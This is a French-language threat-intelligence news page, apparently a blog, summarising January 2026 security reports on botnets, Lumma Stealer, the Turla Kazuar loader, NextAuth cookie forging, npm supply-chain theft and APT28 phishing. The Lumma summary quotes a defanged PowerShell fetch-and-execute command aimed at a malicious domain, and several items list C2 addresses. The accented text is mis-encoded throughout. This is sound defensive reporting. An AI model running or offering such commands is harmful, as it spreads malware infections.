Lumen/Black Lotus Labs perturbe les botnets DDoS Aisuru et Kimwolf en neutralisant 550+ serveurs C2

Selon Black Lotus Labs (Lumen Technologies), l’opĂ©rateur a observĂ© fin 2025 une croissance fulgurante du botnet Aisuru (jusqu’à >11 Tbps), puis l’apparition d’un nouveau botnet Kimwolf, alimentĂ© par l’exploitation de services de proxy rĂ©sidentiel. Lumen dĂ©crit ses actions de disruption (null-routing) ayant permis de neutraliser plus de 550 serveurs C2. — Contexte et montĂ©e en puissance — En septembre 2025, Aisuru passe d’environ 50 000 Ă  200 000 bots/jour, corrĂ©lĂ© Ă  des attaques records (>11 Tbps). Un backend C2 d’Aisuru (65.108.5[.]46) agit comme entonnoir de trafic depuis les C2 confirmĂ©s. Des connexions SSH depuis des IP canadiennes vers 194.46.59[.]169 (proxy-sdk.14emeliaterracewestroxburyma02132[.]su) suggĂšrent une interface de contrĂŽle. Le backend adopte ensuite le domaine client.14emeliaterracewestroxburyma02132[.]su. — Bifurcation vers Kimwolf — ...

16 janvier 2026 Â· 3 min

Lumma Stealer multiplie les tùches planifiées et accroßt le trafic C2 vers fileless-market[.]cc

Source: billet signĂ© par Brad Duncan (publiĂ© le 14 janvier 2026). Contexte: l’auteur documente en laboratoire un exemple d’infection Lumma Stealer prĂ©sentant un comportement post-infection inhabituel qui gĂ©nĂšre une hausse continue de trafic vers un mĂȘme domaine C2. AprĂšs l’exfiltration des donnĂ©es par Lumma Stealer, l’hĂŽte Windows infectĂ© rĂ©cupĂšre des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisĂ©es pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraĂźnant des requĂȘtes HTTPS rĂ©pĂ©tĂ©es vers hxxps[:]//fileless-market[.]cc/. ...

16 janvier 2026 Â· 2 min

Mandiant publie des tables arc-en-ciel Net‑NTLMv1 pour accĂ©lĂ©rer l’abandon du protocole

Source: Mandiant (Threat Intelligence, 15 janvier 2026). Contexte: l’éditeur publie un vaste jeu de tables arc‑en‑ciel pour Net‑NTLMv1, visant Ă  illustrer le risque immĂ©diat de ce protocole obsolĂšte et Ă  favoriser sa dĂ©prĂ©ciation effective. Mandiant annonce la mise Ă  disposition publique d’un dataset complet de tables arc‑en‑ciel Net‑NTLMv1, soulignant que ce protocole est insecure depuis plus de deux dĂ©cennies. L’objectif est de faciliter pour les dĂ©fenseurs la dĂ©monstration concrĂšte de la faiblesse de Net‑NTLMv1 (sans ESS) via une attaque par texte clair connu sur le texte « 1122334455667788 », garantissant la rĂ©cupĂ©ration du matĂ©riel de clĂ© (liĂ© au hash de mot de passe AD) et potentiellement une escalade de privilĂšges. ...

16 janvier 2026 Â· 2 min

Next.js/NextAuth : forger des cookies d’authentification via le NEXTAUTH_SECRET

Dans un billet technique publiĂ© le 14 janvier 2026, l’auteur dĂ©taille une mĂ©thode permettant Ă  un adversaire de forger des cookies d’authentification pour des applications Next.js utilisant NextAuth/Auth.js, en s’appuyant sur la vulnĂ©rabilitĂ© React2Shell (CVE-2025-55182). Le contexte dĂ©crit que l’exploitation de React2Shell peut laisser trĂšs peu de traces et permettre Ă  un attaquant d’exfiltrer des variables d’environnement, notamment des identifiants OAuth et surtout le secret d’application de NextAuth (NEXTAUTH_SECRET/AUTH_SECRET). L’article souligne que la rotation des seuls secrets OAuth est insuffisante : le secret NextAuth est la clĂ© pour chiffrer et authentifier les cookies de session. ...

16 janvier 2026 Â· 2 min

Quishing via QR codes stylisés : Deakin University propose ALFA pour bloquer les scans malveillants

Selon Help Net Security (15 janvier 2026), des chercheurs de Deakin University ont Ă©tudiĂ© l’usage de QR codes stylisĂ©s (couleurs, formes, logos, images de fond) dans les attaques de quishing et prĂ©sentent une mĂ©thode de dĂ©tection centrĂ©e sur la structure du code plutĂŽt que sur l’URL embarquĂ©e. Les QR codes masquent leur destination jusqu’au scan, ce qui contourne les passerelles e-mail qui inspectent les URL en clair. Les versions « fancy » brouillent en plus les repĂšres visuels (modules arrondis/Ă©tirĂ©s, recolorĂ©s, logos centraux, arriĂšre-plans), conservant une scannabilitĂ© Ă©levĂ©e tout en perturbant les outils de dĂ©tection existants. ...

16 janvier 2026 Â· 3 min

Turla: analyse du loader Kazuar v3 (COM, sideloading MFC, contournements ETW/AMSI)

Dans un billet technique publiĂ© le 14 janvier 2026, l’auteur analyse la derniĂšre version du loader Kazuar v3 attribuĂ© Ă  Turla, faisant Ă©cho Ă  une campagne Ă©voquĂ©e par ESET (Ă©tiquette d’agent AGN-RR-01). Le point d’entrĂ©e est un VBScript (8RWRLT.vbs) qui crĂ©e des rĂ©pertoires sous %LOCALAPPDATA%\Programs\HP\Printer\Driver, tĂ©lĂ©charge plusieurs fichiers depuis 185.126.255[.]132, exĂ©cute un exĂ©cutable HP signĂ© (hpbprndi.exe) pour dĂ©clencher un DLL sideloading, et Ă©tablit une persistance via une clĂ© Run. Le script collecte ensuite des infos hĂŽte (OS, uptime, archi CPU, nom machine/utilisateur/domaine, liste des processus, inventaire du dossier créé) et les envoie en POST vers /requestor.php. ...

16 janvier 2026 Â· 3 min

UAT-8837 (nexus chinois) cible l’infrastructure critique nord-amĂ©ricaine et exploite un zero‑day Sitecore

Selon Cisco Talos (Threat Spotlight du 15 janv. 2026), le groupe UAT‑8837 est Ă©valuĂ© avec une confiance moyenne comme un acteur APT Ă  nexus chinois, principalement orientĂ© vers l’obtention d’accĂšs initial Ă  des organisations de grande valeur. Depuis au moins 2025, ses cibles se concentrent sur les secteurs d’infrastructure critique en AmĂ©rique du Nord. AprĂšs compromission, l’acteur dĂ©ploie surtout des outils open source pour collecter des identifiants, configurations de sĂ©curitĂ© et informations de domaine/AD, multipliant les canaux d’accĂšs. Les TTPs et l’infrastructure observĂ©es recoupent l’exploitation rĂ©cente de CVE‑2025‑53690 (zero‑day de dĂ©sĂ©rialisation ViewState dans les produits Sitecore), laissant penser qu’UAT‑8837 dispose d’exploits zero‑day. ...

16 janvier 2026 Â· 3 min

WhisperPair: faille critique dans Google Fast Pair permet l’hijacking et le pistage d’accessoires Bluetooth

Source: COSIC (KU Leuven), 16 janvier 2026. Des chercheurs du groupe COSIC de la KU Leuven prĂ©sentent “WhisperPair”, une famille d’attaques exploitant une mauvaise implĂ©mentation de Google Fast Pair sur de nombreux accessoires audio Bluetooth. ClassĂ©e critique par Google sous CVE-2025-36911, la faille permet Ă  un attaquant d’hijacker des Ă©couteurs/casques et, dans certains cas, d’en suivre la localisation via le rĂ©seau Google Find Hub. Les correctifs dĂ©pendent des fabricants d’accessoires et nĂ©cessitent une mise Ă  jour du firmware. 🎧🔒 ...

16 janvier 2026 Â· 3 min

Attaque supply chain contre l’écosystĂšme n8n via des paquets npm malveillants exfiltrant des identifiants

Source: Endor Labs — Analyse technique d’une campagne de supply chain visant l’écosystĂšme des « community nodes » n8n; mise Ă  jour au 2026-01-13 indiquant que la campagne est toujours active. ⚠ Des attaquants ont publiĂ© sur npm des paquets n8n dĂ©guisĂ©s en intĂ©grations « Google Ads » pour collecter des identifiants OAuth/API via un formulaire de configuration lĂ©gitime, puis exfiltrer ces secrets lors de l’exĂ©cution des workflows vers un serveur sous contrĂŽle adversaire. Cette offensive va au-delĂ  des rĂ©centes failles RCE n8n et exploite la confiance accordĂ©e aux nƓuds communautaires non auditĂ©s. ...

15 janvier 2026 Â· 3 min

APT28 (BlueDelta) intensifie le vol d’identifiants via pages OWA/Google/VPN contre l’énergie et des think tanks

Source: SecurityAffairs, relayant un rapport de l’Insikt Group (Recorded Future). Entre fĂ©vrier et septembre 2025, le groupe liĂ© au GRU russe APT28/BlueDelta a Ă©largi ses opĂ©rations de vol d’identifiants en ciblant des personnels d’agences Ă©nergie/nuclĂ©aire en Turquie, des think tanks europĂ©ens, ainsi que des organisations en MacĂ©doine du Nord et en OuzbĂ©kistan. Les campagnes reposaient sur des fausses pages de connexion imitant Microsoft Outlook Web Access (OWA), Google et Sophos VPN, avec redirection vers les sites lĂ©gitimes aprĂšs la capture des identifiants pour rĂ©duire la dĂ©tection. Les attaquants ont privilĂ©giĂ© des infrastructures Ă  bas coĂ»t et jetables (hĂ©bergement gratuit, services de tunneling) et des leurres PDF lĂ©gitimes (publications du Gulf Research Center et de l’EcoClimate Foundation/ECCO) pour renforcer la crĂ©dibilitĂ© et contourner les contrĂŽles e-mail. ...

14 janvier 2026 Â· 3 min
Derniùre mise à jour le: 9 Mar 2026 📝